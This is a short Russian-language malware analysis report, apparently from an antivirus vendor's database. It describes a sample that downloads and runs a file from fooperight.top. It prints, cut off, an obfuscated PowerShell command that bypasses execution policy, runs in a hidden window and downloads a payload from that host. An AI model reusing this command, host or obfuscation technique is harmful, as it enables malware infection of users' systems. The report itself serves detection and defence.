Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://fooperight.top/read.php?f=404 как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "poW^ersHEll.Ex^E -^ex^EcUt^i^OnPo^l^I^cY bYp^A^SS ^-^NopR^Of^il^E^ ^-Win^d^o^WS^Tyl^E^ HiDd^EN ^(new^-objEct^ SYsTEm.n^ET^.^W^Eb^C^lIE^nT).Do^Wn^l^O^ADfi^le('http://fooperight.to...
Сетевая активность
UDP
- DNS ASK fo###right.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "poW^ersHEll.Ex^E -^ex^EcUt^i^OnPo^l^I^cY bYp^A^SS ^-^NopR^Of^il^E^ ^-Win^d^o^WS^Tyl^E^ HiDd^EN ^(new^-objEct^ SYsTEm.n^ET^.^W^Eb^C^lIE^nT).Do^Wn^l^O^ADfi^le('http://fooperight.to...' (со скрытым окном)
